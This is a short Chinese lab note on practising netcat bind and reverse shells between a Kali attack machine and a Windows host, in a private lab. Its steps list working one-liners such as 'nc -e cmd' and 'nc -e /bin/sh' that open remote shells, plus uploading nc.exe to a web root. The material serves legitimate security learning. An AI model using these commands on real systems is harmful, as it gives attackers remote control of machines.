实验环境
kali攻击机:ip——192.168.91.128
win物理机: phpstudy搭建环境 ip——192.168.2.192
实验目的
采用正反向连接,尝试用kali连接windows,并且反弹shell。
实验步骤
1.开启kali的22端口
(104条消息) 如何在kali系统打开22端口_kali开启22端口_小星唷的博客-CSDN博客https://blog.csdn.net/weixin_43635067/article/details/128275833
2.xshell连接kali
3.将nc.exe传入phpstudy搭建的目录。
文件上传下载-解决无图形化&解决数据传输
nc.exe在127.0.0.1:80端口搭建的根目录中,现将nc.exe传入127.0.01:8080搭建的根目录中
棱角社区生成命令并传入
4.正向连接:本地监听等待对方连接
Linux控制Windows
//绑定CMD到本地5566端口
Windows:nc.exe -e cmd -lvp 5566
//主动连接目标5566
kali:nc 192.168.2.192 5566
Windows控制Linux
//绑定SH到本地5566端口
kali:nc -e /bin/sh -lvp 5566
//主动连接目标5566
windows:nc.exe 192.168.91.128 5566
5.反向连接:主动给出去,对方监听
Windows控制Linux
//绑定sh到目标5566端口
kali:nc -e /bin/sh 192.168.2.192 5566
//等待5566连接
Windows:nc -lvvp 5566
Linux控制Windows
//绑定CMD到目标5566端口
Windows:nc -e cmd 192.168.91.128 5566
//等待5566连接
kali:nc -lvvp 5566